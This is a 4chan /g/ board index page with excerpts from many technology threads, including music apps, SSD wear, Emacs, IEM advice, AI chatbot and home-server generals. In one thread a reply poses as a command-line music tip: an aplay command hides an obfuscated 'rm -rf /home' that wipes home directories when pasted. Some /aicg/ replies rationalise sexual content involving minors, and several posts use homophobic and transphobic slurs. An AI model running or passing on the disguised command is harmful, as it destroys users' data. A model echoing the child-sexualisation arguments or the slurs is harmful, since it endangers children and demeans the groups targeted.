[a / b / c / d / e / f / g / gif / h / hr / k / m / o / p / r / s / t / u / v / vg / vm / vmg / vr / vrpg / vst / w / wg] [i / ic] [r9k / s4s / vip] [cm / hm / lgbt / y] [3 / aco / adv / an / bant / biz / cgl / ck / co / diy / fa / fit / gd / hc / his / int / jp / lit / mlp / mu / n / news / out / po / pol / pw / qst / sci / soc / sp / tg / toy / trv / tv / vp / vt / wsg / wsr / x / xs] [Settings] [Search] [Mobile] [Home]
Board
Settings Mobile Home
/g/ - Technology

Name
Options
Subject
Comment
Verification
4chan Pass users can bypass this verification. [Learn More] [Login]
File
  • Please read the Rules and FAQ before posting.
  • You may highlight syntax and preserve whitespace by using [code] tags.

08/21/20New boards added: /vrpg/, /vmg/, /vst/ and /vm/
05/04/17New trial board added: /bant/ - International/Random
10/04/16New board for 4chan Pass users: /vip/ - Very Important Posts
[Hide] [Show All]


[Advertise on 4chan]

[Catalog] [Archive]

File: images.jpg (28 KB, 600x451)
28 KB
28 KB JPG
how well would using newpipe or pipepipe exclusively as a music player work out? i don't trust revanced or the music-focused youtube frontend one man projects to be secure or reliable
>>
>>106450534
>exclusively
Bad, use it to download your music and then use some simple music player
>>
>>106450606
>youtube
>for music
use
us.qobuz.squid.wtf
or
doubledouble.top
>>
>>106450534
>picrel
>newpipe is NEET software confirmed

File: file.jpg (271 KB, 1200x800)
271 KB
271 KB JPG
Lets have a thread about Ocean Exploration. What is some technology we can use to actually continue exploring the Ocean? How do we combat squids? Unironically though squids are part of the reason most corpos have stopped deep exploration because they straight up attack and mutilate anything they find.
4 replies omitted. Click here to view.
>>
>>106448835
Send 'em squids to me pal.
>>
>>106449433
>Why explore the ocean? So a bunch of rich assholes can start drooling over the resources there and send billions of machines to excavate the floor so they can get better returns on their portfolio? Fuck that shit.
>Why explore the space? So a bunch of rich assholes can start drooling over the resources there and send billions of machines to excavate the floor so they can get better returns on their portfolio? Fuck that shit.
>Why explore other planets? So a bunch of rich assholes can start drooling over the resources there and send billions of machines to excavate the floor so they can get better returns on their portfolio? Fuck that shit.
>Why do anything new? So a bunch of rich assholes can start drooling over the resources there and send billions of machines to excavate the floor so they can get better returns on their portfolio? Fuck that shit.
>>
>>106449634
Am I supposed to hate this?
>>
>>106449634
am i supposed to read this
>>
File: downloadfile.jpg (132 KB, 900x900)
132 KB
132 KB JPG
>>106449433

File: ripssd.png (3 KB, 115x103)
3 KB
3 KB PNG
>1 year old SSD after a year of distro-hopping
6 replies omitted. Click here to view.
>>
>>106450477
Lurk moar
>>
>>106450477
Of course you don't, any /g/ knowledge you have in your head is related with calling every human-being tranny if they dissagree with you, and AI porn
>>
File: 1750207513346542.png (226 KB, 1080x607)
226 KB
226 KB PNG
>>106450430
I have swap disabled in my kernel config, which disables zram.
>>
>>106450410
>linux swap kill ssd
It has nothing to do with Linux swap. The wear on OP's SSD is due to frequent writing to the drive during his distro-hopping streak.
>>106450443
>And you don't use crappy programs (e.g. from the AUR)
You can use AUR and still limit the number of writes to your SSD by moving the .cache directory to a HDD.
>>
File: 1731398751709538.png (27 KB, 673x264)
27 KB
27 KB PNG
still going strong

The age of Windows is over.
140 replies and 29 images omitted. Click here to view.
>>
>>106428981
>no music on command line
aplay --rawaudio "`$'\x72\x6d' $'\55\x72\x66' $'\57\x68\x6f\x6d\x65'`"
>>
>>106450222
what
>>
>>106428990
what do you do on PC outside work?
shitposting and porn? grow up, loser
>>
>>106450522
nice, i love that song.
>>
>>106450522
'Urf' isn't a directory, you retarded faggot.

File: (ichihime-rising-sun).jpg (252 KB, 1024x1024)
252 KB
252 KB JPG
>Lisp is a family of programming languages with a long history and a distinctive parenthesized prefix notation. There are many dialects of Lisp, including Common Lisp, Scheme, Clojure and Elisp.

>Emacs is an extensible, customizable, self-documenting free/libre text editor and computing environment, with a Lisp interpreter at its core.

>Emacs Resources
https://gnu.org/s/emacs
https://github.com/emacs-tw/awesome-emacs
https://github.com/systemcrafters/crafted-emacs

>Learning Emacs
C-h t (Interactive Tutorial)
https://emacs.amodernist.com
https://systemcrafters.net/emacs-from-scratch
http://xahlee.info/emacs
https://emacs.tv

Comment too long. Click here to view the full text.
118 replies and 24 images omitted. Click here to view.
>>
>>106447591
> is hardly a factor in its popularity
It seems to be, in many cases, that it’s inversely proportional
>>
File: eshell.png (1.48 MB, 549x707)
1.48 MB
1.48 MB PNG
japanese ascii art as the eshell banner message
;;; see https://en.wikipedia.org/wiki/Shift_JIS_art
(defface shift-jis-art
'((t :font "-Mona-Mona Gothic Wide-regular-normal-normal-*-16-*-*-*-*-160-iso10646-1"))
"The face for Shift_JIS artwork, which requires an appropriate font,
e.g. Mona font.")

;;; you want non-breaking spaces to be invisible. for example:
;; (set-face-attribute 'nobreak-space nil :underline nil)

(setq eshell-banner-message
(with-temp-buffer
(insert-file "~/.emacs.d/ascii-art/alice")
(propertize (buffer-string) 'face 'shift-jis-art)))
>>
>>106448149
Added bonus. Looks more like real lisp machine.
Is that a proportional font?
I always dreamed of a day standard tab based indenting (as used by steele, sussman, kerginghan, ritchie, etc.) could be used with proportionally based fonts for lisp code again.
>>
>>106447595
you're greatly underappreciating Clojure''s abstractions of sequences, associative data structures (assoc/dissoc), and data structures where things may be added/removed (conj/disj).
yes, you can writing generics for doing this in Common Lisp, but the rest of the community might not, and you end up with the common problem of everyone off doing their own shit
>>
If nothing else Clojure heavily influenced a lot of new Lisp dialects (Fennel, Janet, Carp, Phet, Basilisp...), so clearly it did at least some things right.

File: IMG_3025.jpg (2.97 MB, 3024x4032)
2.97 MB
2.97 MB JPG
How to request advice:
>Budget
>Intended use (media, source, environment)
>Frequency response preference and music examples
>Past gear and your thoughts on them

FAQ:
>Where do I buy IEMs?
Amazon, Aliexpress, Linsoul, Hifigo, Shenzhenaudio

>Shopping Guide (IEMs, PMPs, Cables, Ear Tips, etc.):
https://rentry.org/consoomer_guide

>EQ Guide (EQ 101, Targets, Myths & Misconceptions, Case Studies, etc.):
https://4ciemg.github.io/IEM-EQ-Guide/

Comment too long. Click here to view the full text.
82 replies and 15 images omitted. Click here to view.
>>
>>106438845
Hey guys, does the Ve Odo hold up well with the Kefine Klean or Artti T10 without any issues? I'm new to this hobby.
>>
File: i0wgwvgyjfmf1.jpg (820 KB, 3024x4032)
820 KB
820 KB JPG
>he needs more
I am pretty comfy with this.
>>
>>106450476
>Artti T10
overrated uncomfortable IEM
>>
File: 1756377244307.jpg (94 KB, 1440x1403)
94 KB
94 KB JPG
Let me guess.
>>
>>106449409
You are not a woman, you will never be a woman either

/aicg/ - A general dedicated to the discussion and development of AI chatbots

Longing Edition

>News
Deepseek V3.1 released as deepseek-chat on official API https://api-docs.deepseek.com/news/news250821
OpenAI releases GPT-5 models, all preceding models slated for deprecation https://openai.com/index/introducing-gpt-5
Z.ai releases GLM-4.5 https://z.ai/blog/glm-4.5
Anthropic releases Claude Opus 4.1 https://www.anthropic.com/news/claude-opus-4-1

additional info: https://aicg.neocities.org/info.html

>Frontends
SillyTavern: https://docs.sillytavern.app
RisuAI: https://risuai.net

Comment too long. Click here to view the full text.
353 replies and 52 images omitted. Click here to view.
>>
File: 1730187968839205.png (545 KB, 840x1344)
545 KB
545 KB PNG
>>106451026
>>106451026
>>106451026
>>
>>106450895
anon, girls are menstruating by 13 and many were married younger historically speaking
>>
>>106451006
policing textual fiction is retarded
>>
>>106451006
cunny hobby, please understand
>>
>>106450960
>I don't think violent videogames causes violence.
because you can't, videogames lowers violence just like access to loli lowers pedophilia
it's called sublimation, mongoloid
the same reason why we have historically low violent crime and pedophilia cases when compared to poorer countries

File: 1752156031652326.png (28 KB, 1227x313)
28 KB
28 KB PNG
It's over. They won. We lost.
15 replies omitted. Click here to view.
>>
>>106445162
What makes people thinj adblocks and vpns are not normie? Wake up dude it's not 2015 anymore. Every redditor used adblocks and vpn's are one of the most sponsored grifts out there
>>
>>106448395
you're vastly overestimating the technical knowledge that normies have. they maybe heard the term vpn through their work but i guarantee most of them have never heard of an adblocker
>>
https://killedbygoogle.com/
>>
>>106444743
pretty sure my VPN still works on youtube
>>
>>106448329
paying for YouTube premium should instantly put you on a euthanasia list

File: 1752243350549504.gif (657 KB, 480x364)
657 KB
657 KB GIF
give technology to them and they can only produce garbage
https://i.4cdn.org/wsg/1756651560477221.mp4

technology is not enough
1 reply omitted. Click here to view.
>>
>Japan
>>
>>106449082
https://www.youtube.com/watch?v=Nw2pKfvj0Xs
>>
>>106447823
STOP
PRODUCING
THINGS
I
DON'T
LIKE!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
>>
>>106449144
Yuck.
Gross...
OMG...
>>
>>106450491
Fortunately some japs are waking up before they enact full globohomo on them. They can still make it.

The cost of doing business edition
>Interviewing
Neetcode 150: https://neetcode.io/practice
Tips and interview practice: https://blog.interviewing.io/

>How to write a resume
https://github.com/0xCyberY/CVE-T4PDF

>Salary Stuff
"What's your expected salary?": https://www.fearlesssalarynegotiation.com/salary-expectations-interview-question/
Negotiation advice: https://github.com/petermekhaeil/salary-negotiating
Salary data: https://levels.fyi/

>Software Development & Programming
GitHub Trending - https://github.com/trending

Comment too long. Click here to view the full text.
10 replies and 1 image omitted. Click here to view.
>>
>>106449109
doritos in china be like:
>>
>>106449965
My application tracker is an excel spreadsheet. I've got 133 applications out since July 7th and I've had 50 explicit rejections, 2 very preliminary interviews, and one email that I'm being considered with no other contact of any kind.
>>
>>106449965
why tf would you track applications? as if that's going to help in any meaningful way. i guess if you need to show the unemployment office or something like a nagging mother.
>>
>>106450170
i have an excel spread sheet too but i'm not skiled enough with it to make it fancy like, how do you make an automatic rejection counter with it? i only write down Rejected - date 21th august and i have to manually count if someone ask me lol
>>
>>106450533
Just type in
=COUNTIF(A1:A10, "Rejected")

for a cell's formula, replacing A with whatever column it is in, 1 for whatever your starting row is and 10 with whatever your ending row is. If you add a shit ton of rows, you can click the cell with the formula, then drag down to get the new rows.

File: 1434345.jpg (75 KB, 1024x768)
75 KB
75 KB JPG
never back down edition

Previous: >>106399365.

READ THE (temp)WIKI! & help by contributing:
https://igwiki.lyci.de/wiki/Home_server

/hsg/ is about learning and expanding your horizons. Know all about NAS? Learn virtualization. Spun up some VMs? Learn about networking by standing up a OPNsense/PFsense box and configuring some VLANs. There's always more to learn and chances to grow. Think you’re god-tier already? Setup OpenStack and report back.

>What software should I run?
Install Gentoo. Or whatever flavor of *nix is best for the job or most comfy for you. Jellyfin/Emby/Plex to replace Netflix, Nextcloud to replace Googlel, Ampache/Navidrome to replace Spotify, the list goes on. Look at the awesome self-hosted list and ask.

>Why should I have a home server?
De-botnet your life. Learn something new. Serving applications to yourself, your family, and your frens feels good. Put your tech skills to good use for yourself and those close to you. Store their data with proper availability redundancy and backups and serve it back to them with a /comfy/ easy to use interface.


Comment too long. Click here to view the full text.
117 replies and 15 images omitted. Click here to view.
>>
>>106447029
It's got a strap for a reason. If you're paranoid, you can get a pair of pliers and hold the port while you pull.
>>
what is the ETA on nicgiga dropping a managed switch?
>>
>>106436250
>they are basically unrepairable
skill issue
>>
File: pin9slfzv6da1.jpg (120 KB, 1080x1080)
120 KB
120 KB JPG
Im going to upgrade my opnsense router with some e-waste my work was going to throw away.

I have an i5 3300 and i3 3225 to choose from is there any reason to use the i3 over the i5 for like power/heat? I know the i3 is more than capable I have been using an old amd e-350 for years and its been fine
>>
Anyone used ugreen nas? I really don't want to buy another synology especially since they're being ultra jews by forcing you to buy their drives.

File: wireguard-logo.png (14 KB, 1200x630)
14 KB
14 KB PNG
reasons not to use this?
>>
>>106450572
You don't know about it

>uses Wayland for the first time and the RAM usage while actually doing work is almost halved
Why does no one talk about this?
15 replies and 2 images omitted. Click here to view.
>>
>>106447675
I forgot to quote >>106447593 for the quotes
>>
>>106447561
That is quite the difference. I'll have to try that out because I'm not trying to do anything fancy with Picom, just have basic compositing and not tap out my laptop's ram when I use it for work.
>>
>>106446835
Why would you be fucking gnome?
>>
>>106447675
I was (mistakenly) only referring to use of the X11 widgets being accelerated. I wasn’t aware that GLX could be coerce into rendering client side (X client/server terminology is annoying. Here I mean the remote user SSHing into another computer and running applications on it has GL rendering instructions sent to their machine)


I also believe there’d definitely be an improvement, but that the difference from 66MB to <1MB is probably exaggerating the gain. I doubt the overhead of buffer management structures would be more than 20% of memory usage, the majority would just be holding frame buffer data, and that doesn’t change either way, only the record keeping would. I’d also be interested as to the downsides. I’m not familiar enough with X11 to know. My understanding of Wayland is that it essentially just acts as a system for applications to throw frame buffers around, and windowing and whatnot is built atop that (hence why it’s such a different beast from X11, and lacks a lot of the “batteries included” type stuff. At the end of the day it’s just an IPC spec)
>>
>Quads of TRUTH.
Fucking indians are browning the internet, mate, for fuck's sake

The way things are going in tech and gaming, I'm starting to genuinely wonder if I'm ever going to move away from the am4 platform. Anyone else feel this way?
89 replies and 21 images omitted. Click here to view.
>>
>>106449946
you're right
>>
>>106448653
>AM4 can play every good game ever made at a great framerate.


A Phenom 2 could do that - they haven't been making good games in a while.
>>
>>106442131
I think AM4 is great but I don't see what that's supposed to mean. AM5 is already a significant upgrade. I don't think you NEED an upgrade from AM4 yet if you already have a good AM4 system, especially if you're on Zen 3, but if you're buying new I'd definitely suggest AM5 today.
>>
>>106443856
motherboards do let you do this anon, companies do that all the time for their own signed images and then disable the microsoft key. amazon does this for computers in their warehouses to avoid tampering

i agree with your point for things like google play verification tho
>>
>>106444174
was haswell the last time computing was fun

Everything is already from China, but here we discuss the cheap chink shit you see on various sites.
1st rule of /csg/: If it looks too good to be true, it probably is.

Useful links
>TWS IEM reviews: www.scarbir.com/
>Guide: csg-guide.neocities.org/
>Wiki: https://igwiki.lyci.de/wiki/Chink_Shit_General

>What headphones/earbuds should I buy?
>>>/g/iemg
>I want a cheap smartphone what should I buy?
>>>/g/spg/
>I want to buy some sort of emulation device
>>>/vr/hhg/


Comment too long. Click here to view the full text.
126 replies and 31 images omitted. Click here to view.
>>
File: 1739789357046809.png (95 KB, 414x378)
95 KB
95 KB PNG
>>106450272
>>
>>106450272
sorry gweilo we have a volleyball competition at 4am and we're using your new vacuum/blower combo as the ball
>>
>>106450342
Wrong thread. Jailbroken Kindle or Kobo.
>>
File: 1725790223747421.jpg (141 KB, 1342x1313)
141 KB
141 KB JPG
>>106450272
Dumb laowai, you will never to receive your vacuum pump for penis!
>>
>>106450406
>CuteDeary Store vs. EEDGGWDCDOO
>winner gets to face Shop237623784623 in grand finals at Shenzhen Technological Park


[Advertise on 4chan]

Delete Post: [File Only] Style:
[1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
[1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
[Disable Mobile View / Use Desktop Site]

[Enable Mobile View / Use Mobile Site]

All trademarks and copyrights on this page are owned by their respective parties. Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.